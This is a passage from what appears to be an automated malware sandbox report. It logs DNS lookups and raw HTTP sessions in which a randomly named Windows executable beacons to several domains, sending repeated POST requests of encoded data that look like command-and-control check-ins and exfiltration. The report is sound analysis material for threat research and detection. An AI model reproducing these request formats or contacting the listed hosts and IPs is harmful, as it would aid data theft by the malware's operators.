                                                        Dec 14, 2024 13:58:03.464025021 CET192.168.2.51.1.1.10x22daStandard query (0)www.techmiseajour.netA (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:18.146872044 CET192.168.2.51.1.1.10xb0deStandard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:32.991055965 CET192.168.2.51.1.1.10xe329Standard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:47.865967035 CET192.168.2.51.1.1.10x80cbStandard query (0)www.iglpg.onlineA (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:59:10.616056919 CET192.168.2.51.1.1.10x183fStandard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 14, 2024 13:57:46.996871948 CET1.1.1.1192.168.2.50x8e66No error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:03.914235115 CET1.1.1.1192.168.2.50x22daNo error (0)www.techmiseajour.nettechmiseajour.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 14, 2024 13:58:03.914235115 CET1.1.1.1192.168.2.50x22daNo error (0)techmiseajour.net84.32.84.32A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:18.733769894 CET1.1.1.1192.168.2.50xb0deNo error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:18.733769894 CET1.1.1.1192.168.2.50xb0deNo error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:33.473664999 CET1.1.1.1192.168.2.50xe329No error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:48.362044096 CET1.1.1.1192.168.2.50x80cbNo error (0)www.iglpg.onlineiglpg.onlineCNAME (Canonical name)IN (0x0001)false
                                                        Dec 14, 2024 13:58:48.362044096 CET1.1.1.1192.168.2.50x80cbNo error (0)iglpg.online3.33.130.190A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:58:48.362044096 CET1.1.1.1192.168.2.50x80cbNo error (0)iglpg.online15.197.148.33A (IP address)IN (0x0001)false
                                                        Dec 14, 2024 13:59:11.024543047 CET1.1.1.1192.168.2.50x183fNo error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                                                        Dec 14, 2024 13:59:11.024543047 CET1.1.1.1192.168.2.50x183fNo error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                        Dec 14, 2024 13:59:11.024543047 CET1.1.1.1192.168.2.50x183fNo error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                        Dec 14, 2024 13:59:11.024543047 CET1.1.1.1192.168.2.50x183fNo error (0)1hong.pels5zqo.shop129.226.153.85A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.christinascuties.net
                                                        • www.techmiseajour.net
                                                        • www.aktmarket.xyz
                                                        • www.golivenow.live
                                                        • www.iglpg.online
                                                        • www.1qcczjvh2.autos

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54987674.208.236.156803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:57:47.136542082 CET431OUTGET /raea/?OP=QXZPwDNH0BG0ttd0&OVldGJw=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0C3nDuO5nIZe3j/YTX68cDZNSzr/FZo0tHiTVt9ne+/WzA== HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.christinascuties.net
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:57:48.286823988 CET770INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 626
                                                        Connection: close
                                                        Date: Sat, 14 Dec 2024 12:57:48 GMT
                                                        Server: Apache
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.54991684.32.84.32803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:04.053226948 CET691OUTPOST /jytl/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.techmiseajour.net
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 208
                                                        Origin: http://www.techmiseajour.net
                                                        Referer: http://www.techmiseajour.net/jytl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 6c 71 72 77 70 58 34 65 63 42 69 32 72 38 6b 53 32 79 66 65 71 70 71 35 63 52 6a 62 53 6b 61 4d 67 34 50 59 31 38 3d
                                                        Data Ascii: OVldGJw=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUilqrwpX4ecBi2r8kS2yfeqpq5cRjbSkaMg4PY18=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.54992284.32.84.32803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:06.719878912 CET711OUTPOST /jytl/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.techmiseajour.net
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 228
                                                        Origin: http://www.techmiseajour.net
                                                        Referer: http://www.techmiseajour.net/jytl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 46 53 70 50 5a 55 4b 69 46 7a 57 44 6f 2f 47 69 72 72 31 49 54 55 6c 76 6c 62 78 46 33 74 57 70 4d 78 58 79 48 56
                                                        Data Ascii: OVldGJw=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKFSpPZUKiFzWDo/Girr1ITUlvlbxF3tWpMxXyHV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.54992984.32.84.32803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:09.377326012 CET1728OUTPOST /jytl/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.techmiseajour.net
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1244
                                                        Origin: http://www.techmiseajour.net
                                                        Referer: http://www.techmiseajour.net/jytl/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 33 50 44 37 4d 41 68 39 30 42 33 6c 4b 79 66 46 7a 31 4b 4a 66 7a 62 36 56 61 46 34 70 57 71 50 65 4e 6c 32 4b 6b 36 4e 41 36 77 55 62 70 56 69 39 74 6a 63 46 64 31 63 78 78 49 43 77 33 74 70 71 37 32 6a 61 5a 65 2f 55 62 6b 4b 4e 45 44 48 6d 7a 63 34 6a 51 48 73 33 38 4c 56 62 35 6a 6f 42 75 70 73 6a 50 79 58 33 2b 78 6c 32 34 65 2b 76 4e 62 69 45 70 62 45 53 77 44 71 4e 72 31 59 79 42 56 31 43 31 71 38 77 69 2b 57 59 7a 50 5a 6e 46 4d 52 36 6b 6a 71 37 36 58 34 75 39 34 2b 61 2b 30 63 68 67 67 6b 66 63 4b 38 59 73 34 54 4e 7a 66 50 57 73 35 42 41 51 72 59 69 39 4b 5a 72 [TRUNCATED]
                                                        Data Ascii: OVldGJw=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iF3PD7MAh90B3lKyfFz1KJfzb6VaF4pWqPeNl2Kk6NA6wUbpVi9tjcFd1cxxICw3tpq72jaZe/UbkKNEDHmzc4jQHs38LVb5joBupsjPyX3+xl24e+vNbiEpbESwDqNr1YyBV1C1q8wi+WYzPZnFMR6kjq76X4u94+a+0chggkfcK8Ys4TNzfPWs5BAQrYi9KZrpxQ47mY3YLKnfCjYv7fSat8iak0Pr8AxbUImIcM977stc20RdlKeCvQgibYy+cm2kgNBFyaDq7wh7jmenHNipFTaRAnV5EDebCSbI2w+Iw19j6fH6q+W1TOexkOZv22OVf7HRfosuoMcvVSLcWQG8LcE4LgIu7maLFJxAHVHoVBjURqFQsSi0lIldlo6wjATUvaTEyVywx5Pa3Cc+Cw/OeWPjAOqSxNTrKLaHq7PbRfN3ki+AMZIcBdf8WldzCdCr0L8xjkavKC3PqzZfkCQtwjHdYG53PaPqBLdaTviWmT3q09rkAKH6/PnBnx/m1BiIzF/M5i5r7Mb+D1cMTjVDbsTS4gBPou3w4WCVeI+Cuji48tjbdvjKH20zefeu4pzMxg3MfDayEkHo1FyJRmq01YR3p6WOcaISxm7VpBVnNAnxP32eCt5He+aq4nqcBfRs0M0qo4djgWsk7pGAopIqWqDUrVTVPPqmTqCbr1MUNsS3xAFnk7T5st7dR2WaYMdwb5kL77x7JjIDgJhTtiy2j7H+aQiWtiKxRG+Ve/Df8C56dY/KWuFzx/9AksSyt5zpIL1gi/3UH4VYGkhURdXTXSmM+g1coF2IJM7Zkd0utHZqR1lzogsEKPeaCYZHnwZGTFwvQkv2/ovCNfpgnR2LxH35fNOvNbUU1 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.54993784.32.84.32803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:12.044943094 CET428OUTGET /jytl/?OVldGJw=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4ErYfnV+9J0MgDDdNAn16OZJz59DY9WPzssUTDurce1bk1g==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.techmiseajour.net
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:58:13.135130882 CET1236INHTTP/1.1 200 OK
                                                        Date: Sat, 14 Dec 2024 12:58:12 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9973
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Server: hcdn
                                                        alt-svc: h3=":443"; ma=86400
                                                        x-hcdn-request-id: 4aaa694cf2ff3af1eb2cd74203461fec-bos-edge3
                                                        Expires: Sat, 14 Dec 2024 12:58:11 GMT
                                                        Cache-Control: no-cache
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                        Dec 14, 2024 13:58:13.135185957 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                        Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                        Dec 14, 2024 13:58:13.135201931 CET448INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                        Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                        Dec 14, 2024 13:58:13.135217905 CET1236INData Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e
                                                        Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
                                                        Dec 14, 2024 13:58:13.135236979 CET1236INData Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73
                                                        Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
                                                        Dec 14, 2024 13:58:13.135252953 CET1236INData Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61
                                                        Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
                                                        Dec 14, 2024 13:58:13.135270119 CET1236INData Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d
                                                        Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
                                                        Dec 14, 2024 13:58:13.135293961 CET1236INData Raw: 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 22 29 7d 7d 3b 76 61 72 20 6f 3d 33 36 2c 72 3d 32 31 34 37 34 38 33 36 34 37 3b 66 75 6e 63 74 69 6f 6e 20 65 28 6f 2c 72 29 7b 72 65 74 75 72 6e 20 6f 2b 32 32 2b 37 35 2a 28 6f 3c 32 36 29 2d 28 28 30 21 3d
                                                        Data Ascii: urn e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1,r+=Math.floor(r/e),t=0;455<r;t+=o)r=Math.floor(r/35);return Math.floor(t+36*r/(r+38))}this.decode=f
                                                        Dec 14, 2024 13:58:13.135309935 CET1212INData Raw: 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 3b 61 26 26 28 77 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 29 29 3b 76 61 72 20 76 3d 28 74 3d 74 68 69 73 2e 75 74 66 31 36 2e 64 65 63 6f 64 65 28 74 2e 74 6f 4c 6f 77
                                                        Data Ascii: i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f=0;d<v;++d)t[d]<128&&y.push(String.fromCharCode(w?(m=t[d],(m-=(m-97<26)<<5)+(


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.54995313.248.169.48803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:18.872714996 CET679OUTPOST /wb7v/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.aktmarket.xyz
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 208
                                                        Origin: http://www.aktmarket.xyz
                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 70 66 4b 4b 4d 56 73 65 66 69 64 77 55 71 6e 41 59 6f 69 38 44 35 46 31 76 48 53 58 7a 30 57 59 61 44 38 37 57 4f 45 3d
                                                        Data Ascii: OVldGJw=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3pfKKMVsefidwUqnAYoi8D5F1vHSXz0WYaD87WOE=
                                                        Dec 14, 2024 13:58:19.957495928 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.54996113.248.169.48803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:21.540038109 CET699OUTPOST /wb7v/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.aktmarket.xyz
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 228
                                                        Origin: http://www.aktmarket.xyz
                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
